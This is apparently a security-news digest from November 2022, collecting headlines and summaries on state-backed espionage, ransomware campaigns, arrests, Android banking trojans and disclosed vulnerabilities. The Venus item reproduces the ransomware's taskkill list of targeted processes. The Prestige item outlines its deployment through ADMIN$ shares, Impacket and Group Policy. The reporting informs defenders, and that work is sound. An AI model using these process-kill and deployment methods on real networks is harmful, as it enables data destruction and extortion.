                Autosummary: (CISA’s decision tree for vulnerability prioritization. Source: CISA) Vulnerabilities are thus categorized into four groups. Track: Not for immediate remediation (just within standard update timelines), but should be tracked for changes in status. Track*: Requires closer monitoring for changes. "


                Researchers Say China State-backed Hackers Breached a Digital Certificate Authority

                government
                2022-11-15 https://thehackernews.com/2022/11/researchers-say-china-state-backed.html
                A suspected Chinese state-sponsored actor breached a digital certificate authority as well as government and defense agencies located in different countries in Asia as part of an ongoing campaign since at least March 2022. Symantec, by Broadcom Software, linked the attacks to an adversarial group it tracks under the name Billbug, citing the use of tools previously attributed to this actor. The "

                Autosummary: This comprises utilities such as WinRAR, Ping, Traceroute, NBTscan, Certutil, in addition to a backdoor capable of downloading arbitrary files, gathering system information, and uploading encrypted data. "


                China-linked APT Billbug breached a certificate authority in Asia

                exploits
                2022-11-15 https://securityaffairs.co/wordpress/138568/apt/billbug-apt-hit-certificate-authority.html

                A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part of a cyber espionage campaign aimed at multiple government agencies in the region, Symantec warns. Symantec attributes […]

                The post China-linked APT Billbug breached a certificate authority in Asia appeared first on Security Affairs.

                "

                Autosummary: “The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns.” […] – Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. “The targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates, as mentioned in the introduction.” "


                Researchers release exploit details for Backstage pre-auth RCE bug

                exploits
                2022-11-15 https://www.bleepingcomputer.com/news/security/researchers-release-exploit-details-for-backstage-pre-auth-rce-bug/
                Older versions of the Spotify Backstage development portal builder are vulnerable to a critical (CVSS score: 9.8) unauthenticated remote code execution flaw allowing attackers to run commands on publicly exposed systems. [...] "

                Autosummary: While this number isn’t large, Backstage is used by many large firms, including Spotify, Netflix, Epic Games, Jaguar/Land Rover, Mercedes Benz, American Airlines, Splunk, TUI, Oriflame, Twilio, SoundCloud, HBO Max, HP Inc, Siemens, VMware, and IKEA. "


                Healthcare sector warned of Venus ransomware attacks

                exploits ransomware
                2022-11-15 https://www.tripwire.com/state-of-security/healthcare-sector-warned-venus-ransomware-attacks
                Healthcare organisations in the United States are being warned to be on their guard once again, this time against a family of ransomware known as Venus. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: The Venus ransomware attempts to terminate 39 processes associated with database servers and Microsoft Office applications: taskkill msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe oracle.exe ocssd.exe dbsnmp.exe synctime.exe mydesktopqos.exe agntsvc.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe sqlservr.exe thebat64.exe thunderbird.exe winword.exe wordpad.exe Initial ransom demands in Venus ransomware attacks appear to currently start around 1 BTC (which presently is worth less than US $17,000). "


                PCSpoof: New Vulnerability Affects Networking Tech Used by Spacecraft and Aircraft

                exploits
                2022-11-15 https://thehackernews.com/2022/11/pcspoof-new-vulnerability-affects.html
                A novel attack method has been disclosed against a crucial piece of technology called time-triggered ethernet (TTE) that's used in safety-critical infrastructure, potentially causing the failure of systems powering spacecraft and aircraft. Dubbed PCspooF by a group of academics and researchers from the University of Michigan, the University of Pennsylvania, and the NASA "

                Autosummary: On top of that, while critical devices in the network are subjected to thorough vetting, the non-critical counterparts are not only commercial-off-the-shelf (COTS) devices but also lack the same rigorous process, leading to possible avenues for supply chain compromises that could be weaponized to activate the attack by integrating a rogue third-party component into the system. "


                Researchers Reported Critical SQLi and Access Flaws in Zendesk Analytics Service

                industry
                2022-11-15 https://thehackernews.com/2022/11/researchers-reported-critical-sqli-and.html
                Cybersecurity researchers have disclosed details of now-patched flaws in Zendesk Explore that could have been exploited by an attacker to gain unauthorized access to information from customer accounts that have the feature turned on. "Before it was patched, the flaw would have allowed threat actors to access conversations, email addresses, tickets, comments, and other information from Zendesk "

                Autosummary: "


                North Korean hackers target European orgs with updated malware

                exploits
                2022-11-15 https://www.bleepingcomputer.com/news/security/north-korean-hackers-target-european-orgs-with-updated-malware/
                North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America. [...] "

                Autosummary: A wider distribution: As Kaspersky explains in a report published today, their telemetry shows DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the United States. "


                ThreatX Academy increases access to cybersecurity expertise

                ciber
                2022-11-15 https://www.helpnetsecurity.com/2022/11/16/threatx-academy/

                ThreatX has launched the ThreatX Academy, an online portal hosting an extensive library of cybersecurity training modules. These courses provide an accessible and approachable opportunity for those looking to begin, or advance, their cybersecurity careers. ThreatX is providing all foundational 100-level content at no charge. Training content spans many areas of cybersecurity, including Application Security, Data Protection and Privacy, Networking, Secure DevOps and Wireless Security, among others. The need for cybersecurity professionals has been growing … More

                The post ThreatX Academy increases access to cybersecurity expertise appeared first on Help Net Security.

                "

                Autosummary: Through (ISC)², members can earn several security certifications, including: CISSP; Certified in Cybersecurity; SSCP – Security Administration; CCSP – Cloud Security; CSSLP – Software Security. In order to maintain these certifications, members must earn Continuing Professional Education (CPE) Credits. "


                The psychological fallout of a ransomware crisis

                exploits ransomware
                2022-11-14 https://www.helpnetsecurity.com/2022/11/14/psychological-impact-ransomware-attacks-video/

                Northwave has conducted scientific research into the psychological fallout of a ransomware crisis on both organizations and individuals. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. It also shows how IT and security teams can be thrown into disarray long after the problem has passed. In this Help Net Security video, Inge van der Beijl, Director Behaviour & Resilience at Northwave, talks about the research findings and illustrates … More

                The post The psychological fallout of a ransomware crisis appeared first on Help Net Security.

                "

                Autosummary: "


                Key cybersecurity trends in the energy sector

                industry ciber
                2022-11-14 https://www.helpnetsecurity.com/2022/11/14/energy-sector-cybersecurity-trends-video/

                The key trends for the energy industry are about how we manage the future supply and demand challenges at a much more granular level than we are currently able to do. If we’re ever to balance the supply and demand equation against the backdrop of increased consumer demands (electric vehicles, mass transport systems, electrification of home heating systems, etc.), and the increased complexity in the generation, distribution and storage systems, this supply and demand will have … More

                The post Key cybersecurity trends in the energy sector appeared first on Help Net Security.

                "

                Autosummary: "


                New KmsdBot Malware Hijacking Systems for Mining Crypto and Launch DDoS Attacks

                exploits
                2022-11-14 https://thehackernews.com/2022/11/new-kmsdbot-malware-hijacking-systems.html
                A newly discovered evasive malware leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks. Dubbed KmsdBot by the Akamai Security Intelligence Response Team (SIRT), the Golang-based malware has been found targeting a variety of companies ranging from gaming to "

                Autosummary: "Interestingly, the most targeted country in Q3 2022 was Ethiopia (2.38%), where it is illegal to use and mine cryptocurrencies," the Russian cybersecurity company said. "


                CERT-UA warns of multiple Somnia ransomware attacks against organizations in Ukraine

                exploits ransomware
                2022-11-14 https://securityaffairs.co/wordpress/138496/hacking/somnia-ransomware-attacks-ukraine.html

                Russian threat actors employed a new ransomware family called Somnia in attacks against multiple organizations in Ukraine. The Government Computer Emergency Response Team of Ukraine CERT-UA is investigating multiple attacks against organizations in Ukraine that involved a new piece of ransomware called Somnia. Government experts attribute the attacks to the group ‘From Russia with Love’ […]

                The post CERT-UA warns of multiple Somnia ransomware attacks against organizations in Ukraine appeared first on Security Affairs.

                "

                Autosummary: In the second version, the AES algorithm is implemented; at the same time, taking into account the dynamics of the key and the initialization vector, this version of Somnia, according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.” "


                Have board directors any liability for a cyberattack against their company?

                ciber
                2022-11-14 https://securityaffairs.co/wordpress/138507/security/board-directors-liability-for-cyberattack.html

                Are the directors of a company hit by a cyberattack liable for negligence in failing to take steps to limit the risk? As the risk of a cyberattack grows, it is pivotal to consider whether the directors of a company hit by a ransomware attack, for example, can bear any liability for negligence in failing […]

                The post Have board directors any liability for a cyberattack against their company? appeared first on Security Affairs.

                "

                Autosummary: In this context, some of the worst-case scenarios from the perspective of directors’ liability should a cyber attack occur are the following: the actions listed above have been discussed at the board of directors meeting, but no activity has been undertaken; risk analysis actions were undertaken, a weakness in the information systems was identified, but the company did nothing (or very little) to correct it in a timely manner; the company realizes that it has not paid for the renewal of the insurance policy covering the cyber risk, considering it to be remote and assessing the policy to be excessively expensive. The BoD will have to, among other things, analyze the corrective actions to be taken to minimize the negative consequences of the cyber attack, assess the economic impact of the attack, including in terms of possible penalties, in order to inform shareholders and create a budget reserve, and decide whether the incident should be reported to the appropriate authorities and communicated to the individuals whose data was compromised. Also, due to the costs of the pandemic, but in general due to other overriding priorities, some companies do not conduct periodic penetration tests and analyses of the maturity of the technical and organizational measures taken to reduce cyber risk; when these analyses flag weaknesses, they do not immediately handle them but add them to a “to-do list” without a specific short-term deadline; and they rely on an incident response plan that has not been tested and, therefore, may not function properly in the event of an attack. The size of the cyber risk to companies cannot be underestimated: on average, there is a cyber attack every 39 seconds, which does not mean that every attack is successful, but that there is an attempt to access companies’ computer systems with that frequency. "


                Russian hacktivists hit Ukrainian orgs with ransomware – but no ransom demands

                exploits ransomware
                2022-11-14 https://www.helpnetsecurity.com/2022/11/14/somnia-ransomware-ukrainian/

                The Ukrainian CERT (CERT-UA) has uncovered an attack campaign aimed at compromising Ukrainian organizations and irretrievably encrypting their files. To do that, they are leveraging a specific version of the Somnia ransomware that, “according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.” How the attacks unfolded: The Ukrainian cyber experts believe that the attack was effected by Russian hacktivists that go by FRwL (From Russia with Love), with help … More

                The post Russian hacktivists hit Ukrainian orgs with ransomware – but no ransom demands appeared first on Help Net Security.

                "

                Autosummary: "


                Whoosh confirms data breach after hackers sell 7.2M user records

                financial
                2022-11-14 https://www.bleepingcomputer.com/news/security/whoosh-confirms-data-breach-after-hackers-sell-72m-user-records/
                The Russian scooter-sharing service Whoosh has confirmed a data breach after hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. [...] "

                Autosummary: What's for sale: On Friday, a user on the "Breached" hacking forums posted a database containing details about 7.2 million Whoosh customers, including email addresses, phone numbers, and first names. "


                Offensive Security partners with Climb Credit to increase access to cybersecurity education

                ciber
                2022-11-13 https://www.helpnetsecurity.com/2022/11/13/offensive-security-climb-credit/

                Offensive Security has partnered with Climb Credit to make professional cybersecurity education more affordable and accessible for individuals through a variety of financing options. There is an ongoing need for cybersecurity experts. According to data from CyberSeek, there are 760,000 cybersecurity job openings in the United States. At the same time, the number of cyberattacks continues to rise at a rate of 32% year over year, according to Check Point Research. A survey from cybersecurity … More

                The post Offensive Security partners with Climb Credit to increase access to cybersecurity education appeared first on Help Net Security.

                "

                Autosummary: “Climb’s mission is to make career-related education affordable, accessible, and inclusive. "


                Week in review: Microsoft fixes many zero-days, malicious droppers on Google Play, IRISSCON 2022

                exploits
                2022-11-13 https://www.helpnetsecurity.com/2022/11/13/week-in-review-microsoft-fixes-many-zero-days-malicious-droppers-on-google-play-irisscon-2022/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Taking cybersecurity investments to the next level In this Help Net Security interview, the former Trident Capital leader offers insight into innovation in the cybersecurity market, M&A activity, pitching to VCs, and more. Microsoft fixes many zero-days under attack November 2022 Patch Tuesday is here, with fixes for many vulnerabilities actively exploited in the wild, including CVE-2022-41091, a Windows Mark … More

                The post Week in review: Microsoft fixes many zero-days, malicious droppers on Google Play, IRISSCON 2022 appeared first on Help Net Security.

                "

                Autosummary: New infosec products of the week: November 11, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Flashpoint, ImmuniWeb, Lacework, Picus Security, and Vanta. "


                Lockbit gang leaked data stolen from global high-tech giant Thales

                ransomware
                2022-11-13 https://securityaffairs.co/wordpress/138471/data-breach/lockbit-leaked-thales-files.html

                The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, essential […]

                The post Lockbit gang leaked data stolen from global high-tech giant Thales appeared first on Security Affairs.

                "

                Autosummary: The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, essential to the development of our societies, by placing people at the heart of decision-making. "


                Ukraine says Russian hacktivists use new Somnia ransomware

                exploits ransomware
                2022-11-13 https://www.bleepingcomputer.com/news/security/ukraine-says-russian-hacktivists-use-new-somnia-ransomware/
                Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called "Somnia," encrypting their systems and causing operational problems. [...] "

                Autosummary: The file types (extensions) targeted by Somnia ransomware are shown below, including documents, images, databases, archives, video files, and more, reflecting the destruction this strain aims to cause. "


                Malicious app in the Play Store spotted distributing Xenomorph Banking Trojan

                financial exploits
                2022-11-12 https://securityaffairs.co/wordpress/138440/malware/xenomorph-banking-malware-play-store.html

                Experts discovered two new malicious dropper apps on the Google Play Store distributing the Xenomorph banking malware. Zscaler ThreatLabz researchers discovered a couple of malicious dropper apps on the Play Store distributing the Xenomorph banking malware. Xenomorph was first spotted by ThreatFabric researchers in February 2022; at the time, the malware was employed in attacks […]

                The post Malicious app in the Play Store spotted distributing Xenomorph Banking Trojan appeared first on Security Affairs.

                "

                Autosummary: "


                Canadian supermarket chain giant Sobeys suffered a ransomware attack

                exploits ransomware
                2022-11-12 https://securityaffairs.co/wordpress/138424/cyber-crime/sobeys-ransomware-attack.html

                Sobeys, the second-largest supermarket chain in Canada, was the victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second largest supermarket chain in Canada; the company operates over 1,500 stores across Canada under a variety of banners. It is a wholly-owned subsidiary of Empire Company Limited, a Canadian business conglomerate. During […]

                The post Canadian supermarket chain giant Sobeys suffered a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: “Both Quebec’s access to information commission and Alberta’s privacy commission have both been notified by the grocer about a “confidentiality incident,”” reported the Toronto Star. Bleeping Computer first reported that the systems of the company were infected with Black Basta; the attribution of the attack is based on ransom notes and negotiation chats Bleeping Computer has observed. "


                New extortion scam threatens to damage sites’ reputation, leak data

                financial
                2022-11-12 https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-damage-sites-reputation-leak-data/
                An active extortion scam is targeting website owners and admins worldwide, claiming to have hacked their servers and demanding $2,500 not to leak data. [...] "

                Autosummary: Once you've paid, we'll stop what we were doing, we'll destroy all data taken from your site, your databases, your mailboxes, and you'll never hear from us again. The emails appear to be non-targeted, with ransom demand recipients from all verticals, including personal bloggers, government agencies, and large corporations. "


                Merlin Cyber collaborates with Titania to improve network security for government agencies

                government
                2022-11-11 https://www.helpnetsecurity.com/2022/11/11/merlin-cyber-titania/

                Merlin Cyber partners with Titania, helping U.S. government agencies to accurately detect, risk-prioritize, and remediate exploitable misconfigurations in their firewalls, switches, and routers in order to reduce their attack surfaces. Through the partnership, Merlin Cyber’s GEAR Partner Program will help Titania strategically extend its public sector footprint, enabling more agencies to embrace continuous, proactive network security. According to a 2022 market study “The Impact of Exploitable Misconfigurations on the Security of Agencies’ Networks and Current … More

                The post Merlin Cyber collaborates with Titania to improve network security for government agencies appeared first on Help Net Security.

                "

                Autosummary: "


                Personal cybersecurity is now a company problem

                ciber
                2022-11-11 https://www.helpnetsecurity.com/2022/11/11/personal-cybersecurity-company-problem-video/

                As work and personal lives have almost merged into one, threat actors are increasingly targeting people because of their work lives, and cybersecurity needs to adapt to the new reality. In this Help Net Security video, Amir Targighat, CEO at Agency, discusses the rise of employee digital risk. He explores the intersection of personal and enterprise cybersecurity and new approaches for managing the new wave of attacks.

                The post Personal cybersecurity is now a company problem appeared first on Help Net Security.

                "

                Autosummary: "


                Flashpoint’s ransomware prediction model enables security teams to remediate vulnerabilities

                exploits ransomware
                2022-11-11 https://www.helpnetsecurity.com/2022/11/11/flashpoint-ransomware-prediction-model/

                Flashpoint announced a ransomware prediction model that allows vulnerability management teams to improve remediation efforts that could prevent cyber extortion events with VulnDB. According to the U.S. Treasury Department, financial institutions filed $1.2B in ransomware-related costs in 2021, nearly double the amount reported by banks in 2020. In order to help organizations proactively prevent a ransomware attack, Flashpoint’s latest capability enables vulnerability management teams to identify the likelihood that a particular vulnerability could be used … More

                The post Flashpoint’s ransomware prediction model enables security teams to remediate vulnerabilities appeared first on Help Net Security.

                "

                Autosummary: "


                Ostrich Cyber-Risk Birdseye CRQ Simulator defines cyber risk in financial values

                financial
                2022-11-11 https://www.helpnetsecurity.com/2022/11/11/ostrich-cyber-risk-birdseye-crq-simulator-defines-cyber-risk-in-financial-values/

                Ostrich Cyber-Risk debuted the Ostrich Cyber-Risk Birdseye CRQ Simulator, designed to define cyber risk in financial values to aid informed business decisions for reducing risk. Security and risk leaders face unprecedented pressure to protect their organization against ongoing threats including ransomware, data breaches and insider threats. Quantifying these risks is necessary to understand, evaluate, prioritize and communicate the risks in financial terms. This helps improve decision-making, optimize spending and address growing regulatory requirements by … More

                The post Ostrich Cyber-Risk Birdseye CRQ Simulator defines cyber risk in financial values appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland

                exploits ransomware
                2022-11-11 https://thehackernews.com/2022/11/microsoft-blames-russian-hackers-for.html
                Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group. The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place "

                Autosummary: "


                Russian-Canadian National Charged Over Involvement in LockBit Ransomware Attacks

                exploits ransomware
                2022-11-11 https://thehackernews.com/2022/11/russian-canadian-national-charged-over.html
                The U.S. Department of Justice (DoJ) has announced charges against a dual Russian and Canadian national for his alleged participation in LockBit ransomware attacks across the world. The 33-year-old Ontario resident, Mikhail Vasiliev, has been taken into custody and is awaiting extradition to the U.S., where he is likely to be sentenced for a maximum of five years in prison. Vasiliev has been "

                Autosummary: "


                Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine

                exploits ransomware
                2022-11-11 https://securityaffairs.co/wordpress/138362/apt/prestige-ransomware-linked-iridium.html

                Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige ransomware, employed in attacks targeting organizations in the transportation and related logistics industries in Ukraine and Poland. The Prestige ransomware first appeared in the threat […]

                The post Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine appeared first on Security Affairs.

                "

                Autosummary: MSTIC researchers observed threat actors using three methods to deploy the Prestige ransomware. Method 1: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload. Method 2: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload. Method 3: The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object. Microsoft published a list of indicators of compromise (IOCs) and advanced hunting queries to detect Prestige ransomware infections. "


                Alleged LockBit ransomware operator arrested in Canada

                exploits ransomware
                2022-11-11 https://www.bitdefender.com/blog/hotforsecurity/alleged-lockbit-ransomware-operator-arrested-in-canada/
                A man with dual Russian and Canadian nationality has been arrested in connection with his alleged part in the LockBit ransomware conspiracy that has demanded more than $100 million from its victims. Read more in my article on the Hot for Security blog. "

                Autosummary: In addition, the criminal complaint against Vasiliev says that screenshots of end-to-end encrypted conversations with the Tux username "LockBitSupp" (assumed to be shorthand for "LockBitSupport") were uncovered, which contained multiple discussions related to the ransomware operation and communication with victims. "


                These Two Google Play Store Apps Spotted Distributing Xenomorph Banking Trojan

                financial exploits
                2022-11-11 https://thehackernews.com/2022/11/these-two-google-play-store-apps.html
                Google has removed two new malicious dropper apps that have been detected on the Play Store for Android, one of which posed as a lifestyle app and was caught distributing the Xenomorph banking malware. "Xenomorph is a trojan that steals credentials from banking applications on users' devices," Zscaler ThreatLabz researchers Himanshu Sharma and Viral Gandhi said in an analysis published Thursday. "

                Autosummary: "


                Man charged for role in LockBit ransomware operation

                exploits ransomware
                2022-11-11 https://securityaffairs.co/wordpress/138381/cyber-crime/man-charged-lockbit-ransomware-attacks.html

                The U.S. DoJ charged a Russian-Canadian national for his alleged role in LockBit ransomware attacks against organizations worldwide. The U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation. According to the press release published by DoJ, the man is currently in custody in […]

                The post Man charged for role in LockBit ransomware operation appeared first on Security Affairs.

                "

                Autosummary: “This arrest is the result of over two-and-a-half-years of investigation into the LockBit ransomware group, which has harmed victims in the United States and around the world,” said Deputy Attorney General Lisa O. Monaco. "


                Canadian food retail giant Sobeys hit by Black Basta ransomware

                exploits ransomware
                2022-11-11 https://www.bleepingcomputer.com/news/security/canadian-food-retail-giant-sobeys-hit-by-black-basta-ransomware/
                Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend. [...] "

                Autosummary: Sobeys is one of two national grocery retailers in Canada, with 134,000 employees servicing a network of 1,500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs. "


                U.S. seized 18 web domains used for recruiting money mules

                financial
                2022-11-11 https://www.bleepingcomputer.com/news/security/us-seized-18-web-domains-used-for-recruiting-money-mules/
                The FBI and U.S. Postal Inspection Service have seized eighteen web domains used to recruit money mules for work-from-home and reshipping scams. [...] "

                Autosummary: amari-dash.com control-scorpio.com costa-account.com dash-amari.com dashboard-zim.com dash-egreen.com dash-orient.com dash-satori.com dash-spt.com egreen-dash.com main-sgl.com navois-account.com orient-dash.com satori-dash.com scorpio-control.com spt-dash.com zim-dash.com If you previously visited these websites or had any exchange with their operators, you are advised to report it to the FTC and follow these instructions on what to do next. "


                New BadBazaar Android malware linked to Chinese cyberspies

                exploits
                2022-11-11 https://www.bleepingcomputer.com/news/security/new-badbazaar-android-malware-linked-to-chinese-cyberspies/
                A previously undocumented Android spyware tool named "BadBazaar" has been discovered targeting ethnic and religious minorities in China, most notably the Uyghurs in Xinjiang. [...] "

                Autosummary: BadBazaar's retrieved JAR payload (Lookout) BadBazaar's data-collecting capabilities include the following: precise location; list of installed apps; call logs with geolocation data; contacts list; SMS; complete device info; WiFi info; phone call recording; taking pictures; exfiltrating files or databases; accessing folders of high interest (images, IM app logs, chat history, etc.). "


                The Week in Ransomware - November 11th 2022 - LockBit feeling the heat

                exploits ransomware
                2022-11-11 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-11th-2022-lockbit-feeling-the-heat/
                This "Week in Ransomware" covers the last two weeks of ransomware news, with new information on attacks, arrests, data wipers, and reports shared by cybersecurity firms and researchers. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include @jorntvdw, @DanielGallagher, @Seifreed, @LawrenceAbrams, @struppigel, @malwareforme, @demonslay335, @Ionut_Ilascu, @fwosar, @FourOctets, @VK_Intel, @malwrhunterteam, @serghei, @PolarToffee, @BleepinComputer, @billtoulas, @LabsSentinel, @vinopaljiri, @_CPResearch_, @ahnlab. "


                Patch Tuesday includes 6 Windows zero-day flaws; patch now!

                exploits
                2022-11-11 https://www.computerworld.com/article/3679631/patch-tuesday-includes-6-windows-zero-day-flaws-patch-now.html#tk.rss_security

                Microsoft on Tuesday released a tightly focused but still significant update that addresses 68 reported (some publicly) vulnerabilities. Unfortunately, this month brings a new record: six zero-day flaws affecting Windows. As a result, we have added both the Windows and Exchange Server updates to our "Patch Now" schedule. Microsoft also published a "defense in depth" advisory (ADV220003) to help secure Office deployments. And there are a small number of Visual Studio, Word, and Excel updates to add to your standard patch release schedule.


                "

                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET). You can find links to all of the Microsoft updates here: CVE-2022-3652, CVE-2022-3653, CVE-2022-3654, CVE-2022-3655, CVE-2022-3656, CVE-2022-3657, CVE-2022-3660, CVE-2022-3661. This month's update covers the following Windows features: Windows Scripting (the Windows scripting host or object); Networking (particularly how HTTPS is handled); Windows Printing (the print spooler, again); ODBC (the least of our worries this month). Unless otherwise specified, we should assume that each Patch Tuesday update will require testing of core printing functions including: printing from directly connected printers; large print jobs from servers (especially if they are also domain controllers); remote printing (using RDP and VPN). More generally, given the broad nature of this update (Office and Windows), we suggest testing the following Windows features and components: Hyper-V Update: a simple test of starting and stopping VMs and isolated containers will suffice for this minor update. "


                FIFA World Cup 2022 scams: Beware of fake lotteries, ticket fraud and other cons

                financial
                2022-11-11 https://www.welivesecurity.com/2022/11/11/fifa-world-cup-2022-scams-fake-lotteries-ticket-fraud/

                When in doubt, kick it out, plus other tips for hardening your cyber-defenses against World Cup-themed phishing and other scams

                The post FIFA World Cup 2022 scams: Beware of fake lotteries, ticket fraud and other cons appeared first on WeLiveSecurity

                "

                Autosummary: Your cybersecurity game plan Staying safe from scams, be they World Cup-themed or not, comes down to a few, simple rules: You can’t win a lottery if you didn’t buy a ticket.❌🤔✅ Don’t fall into the trap because of your urge for soccer.#GMsectec #Phishing #Qatar2022 pic.twitter.com/MwnUWjw6ZO — GM Sectec (@gmsectec) September 3, 2022 Rogue websites Sometimes a more convincing (if you don’t pay much attention to detail, that is) variety of phishing fraud involves rogue websites posing as the real ones.To collect your “winnings”, it appears that you only need to fill in a few fields via a form and provide personal details, such as your full name, date of birth, and phone number. "


                An initial access broker claims to have hacked Deutsche Bank

                financial
                2022-11-11 https://securityaffairs.co/wordpress/138416/data-breach/deutsche-bank-alleged-data-breach.html

                An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online. The security researcher Dominic Alvieri was one of the first experts […]

                The post An initial access broker claims to have hacked Deutsche Bank appeared first on Security Affairs.

                "

                Autosummary: “FTP , Shells , root , SQL-inj, DB, Servers.. "


                Living Security collaborates with SpyCloud to manage and mitigate human cybersecurity risk

                ciber
                2022-11-10 https://www.helpnetsecurity.com/2022/11/10/living-security-spycloud/

                Living Security partners with SpyCloud to better identify segments of human risk inside organizations and help security leaders create a proactive plan to mitigate attacks. Living Security’s Unify Human Risk Management Platform now includes SpyCloud’s Identity Risk Engine, which delivers risk assessments and key risk indicators (KRIs) based on analysis of 300+ billion assets recaptured from data breaches and malware victim logs being traded in the criminal underground. The KRIs link email addresses, usernames, passwords, … More

                The post Living Security collaborates with SpyCloud to manage and mitigate human cybersecurity risk appeared first on Help Net Security.

                "

                Autosummary: The KRIs link email addresses, usernames, passwords, and PII across employees’ exposed online personas, giving security teams a fuller picture of individuals’ security hygiene, as well as details on the scope, recency, and severity of their darknet exposures. "


                How ransomware gangs and malware campaigns are changing

                exploits ransomware
                2022-11-10 https://www.helpnetsecurity.com/2022/11/10/malware-ransomware-trends/

                Deep Instinct released its 2022 Bi-Annual Cyber Threat Report which focuses on the top malware and ransomware trends and tactics from the first half of 2022 and provides key takeaways and predictions for the ever-evolving cybersecurity threat landscape. “2022 has been another record year for cyber criminals and ransomware gangs. It’s no secret that these threat actors are constantly upping their game with new and improved tactics designed to evade traditional cyber defenses,” said Mark … More

                The post How ransomware gangs and malware campaigns are changing appeared first on Help Net Security.

                "

                Autosummary: Not surprisingly, ransomware attacks remain a serious threat to organizations, as there are currently 17 leaked databases operated by threat actors who are leveraging the data for attacks on third-party companies, most notably social engineering, credential theft, and triple-extortion attacks. "


                Lacework enhances CNAPP capabilities with attack path analysis and agentless vulnerability scanning

                exploits
                2022-11-10 https://www.helpnetsecurity.com/2022/11/10/polygraph-cnapp/

                Lacework announced new cloud-native application protection platform (CNAPP) capabilities for the Polygraph Data Platform that provide improved attack path analysis and agentless workload scanning for secrets and vulnerabilities. These capabilities provide better visibility into today’s increasingly complex security environment, enabling organizations to instantly understand what matters so they can triage and respond faster. According to the latest Lacework Cloud Threat Report, attackers are rapidly increasing in sophistication, with a particular focus on infrastructure. Attackers constantly … More

                The post Lacework enhances CNAPP capabilities with attack path analysis and agentless vulnerability scanning appeared first on Help Net Security.

                "

                Autosummary: This enables: a better understanding of the cloud environment and potential risks with an up-to-date inventory of software components and information about vulnerabilities and exposed secrets in the production environment; the ability to scan more resources without an agent for more complete coverage of the runtime environment and to stay compliant with security standards and business needs; more flexibility and choice to build layered security with continuous monitoring. “We take security seriously and always consider it a critical factor when we build or deploy new services,” says Charly Vitrano, Director of Security Operations at Medallia. "


                High-Severity Flaw Reported in Critical System Used by Oil and Gas Companies

                industry
                2022-11-10 https://thehackernews.com/2022/11/high-severity-flaw-reported-in-critical.html
                Cybersecurity researchers have disclosed details of a new vulnerability in a system used across oil and gas organizations that could be exploited by an attacker to inject and execute arbitrary code. The vulnerability, tracked as CVE-2022-0902 (CVSS score: 8.1), is a path-traversal vulnerability in ABB Totalflow flow computers and remote controllers. "Attackers can exploit this flaw to gain root "

                Autosummary: "


                Is Cybersecurity Awareness Month Anything More Than PR?

                ciber
